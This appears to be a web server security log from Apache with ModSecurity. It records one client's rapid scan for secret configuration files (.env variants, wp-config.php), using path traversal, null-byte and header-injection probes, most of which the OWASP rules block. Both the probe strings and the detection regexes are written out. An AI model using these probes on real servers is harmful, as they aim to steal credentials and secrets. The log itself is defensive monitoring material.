[Tue May 12 05:30:31.925917 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe19r1yOh9Tvizezif5gAAAEY"]
[Tue May 12 05:30:31.925953 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe19r1yOh9Tvizezif5gAAAEY"]
[Tue May 12 05:30:31.926357 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe19r1yOh9Tvizezif5gAAAEY"]
[Tue May 12 05:30:32.454496 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe1wgpmE1yW0glLdgukQAAAM4"]
[Tue May 12 05:30:32.485139 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe181tk6y7yBJLpJo6DgAAAIY"]
[Tue May 12 05:30:32.497965 2026] [core:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] AH10244: invalid URI path (/css../../../.env)
[Tue May 12 05:30:32.526319 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.example"] [unique_id "agKe2M1tk6y7yBJLpJo6EgAAAIY"]
[Tue May 12 05:30:32.526530 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.example"] [unique_id "agKe2M1tk6y7yBJLpJo6EgAAAIY"]
[Tue May 12 05:30:32.717653 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe19r1yOh9Tvizezif5gAAAEY"]
[Tue May 12 05:30:32.754221 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe2Nr1yOh9Tvizezif6QAAAEY"]
[Tue May 12 05:30:32.754282 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe2Nr1yOh9Tvizezif6QAAAEY"]
[Tue May 12 05:30:32.754310 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe2Nr1yOh9Tvizezif6QAAAEY"]
[Tue May 12 05:30:32.754908 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe2Nr1yOh9Tvizezif6QAAAEY"]
[Tue May 12 05:30:33.339263 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe2M1tk6y7yBJLpJo6EgAAAIY"]
[Tue May 12 05:30:33.378481 2026] [core:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] AH10244: invalid URI path (/css../../../../.env)
[Tue May 12 05:30:33.574686 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe2Nr1yOh9Tvizezif6QAAAEY"]
[Tue May 12 05:30:33.610252 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/app/.env"] [unique_id "agKe2dr1yOh9Tvizezif7QAAAEY"]
[Tue May 12 05:30:33.610468 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/app/.env"] [unique_id "agKe2dr1yOh9Tvizezif7QAAAEY"]
[Tue May 12 05:30:34.380698 2026] [core:error] [pid 1825287:tid 1825307] [client 45.148.10.247:6884] AH10244: invalid URI path (/../../.env)
[Tue May 12 05:30:34.385607 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe2hfeipD4uoG21FoxAAAAABQ"]
[Tue May 12 05:30:34.385687 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe2hfeipD4uoG21FoxAAAAABQ"]
[Tue May 12 05:30:34.385877 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe2hfeipD4uoG21FoxAAAAABQ"]
[Tue May 12 05:30:34.413544 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe2dr1yOh9Tvizezif7QAAAEY"]
[Tue May 12 05:30:34.450600 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/var/www/.env"] [unique_id "agKe2tr1yOh9Tvizezif8QAAAEY"]
[Tue May 12 05:30:34.450811 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/var/www/.env"] [unique_id "agKe2tr1yOh9Tvizezif8QAAAEY"]
[Tue May 12 05:30:35.195863 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe2hfeipD4uoG21FoxAAAAABQ"]
[Tue May 12 05:30:35.229732 2026] [core:error] [pid 1825179:tid 1825221] [client 45.148.10.247:6848] AH10244: invalid URI path (/../.env)
[Tue May 12 05:30:35.235750 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe2xfeipD4uoG21FoxAwAAABQ"]
[Tue May 12 05:30:35.235822 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe2xfeipD4uoG21FoxAwAAABQ"]
[Tue May 12 05:30:35.236014 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe2xfeipD4uoG21FoxAwAAABQ"]
[Tue May 12 05:30:35.264586 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe2tr1yOh9Tvizezif8QAAAEY"]
[Tue May 12 05:30:35.299548 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/var/www/html/.env"] [unique_id "agKe29r1yOh9Tvizezif9QAAAEY"]
[Tue May 12 05:30:35.299764 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/var/www/html/.env"] [unique_id "agKe29r1yOh9Tvizezif9QAAAEY"]
[Tue May 12 05:30:36.052133 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe2xfeipD4uoG21FoxAwAAABQ"]
[Tue May 12 05:30:36.091002 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe3BfeipD4uoG21FoxBgAAABQ"]
[Tue May 12 05:30:36.091084 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe3BfeipD4uoG21FoxBgAAABQ"]
[Tue May 12 05:30:36.091260 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe3BfeipD4uoG21FoxBgAAABQ"]
[Tue May 12 05:30:36.092390 2026] [core:error] [pid 1820198:tid 1820202] [client 45.148.10.247:6872] AH10244: invalid URI path (/.%00/../../.env)
[Tue May 12 05:30:36.115195 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe29r1yOh9Tvizezif9QAAAEY"]
[Tue May 12 05:30:36.151819 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/public/.env"] [unique_id "agKe3Nr1yOh9Tvizezif-AAAAEY"]
[Tue May 12 05:30:36.152051 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/public/.env"] [unique_id "agKe3Nr1yOh9Tvizezif-AAAAEY"]
[Tue May 12 05:30:36.941104 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.247:6856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe3BfeipD4uoG21FoxBgAAABQ"]
